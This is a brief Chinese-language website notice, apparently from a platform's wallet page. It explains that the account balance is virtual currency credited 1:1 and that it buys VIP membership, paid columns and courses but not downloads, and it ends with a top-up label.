                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值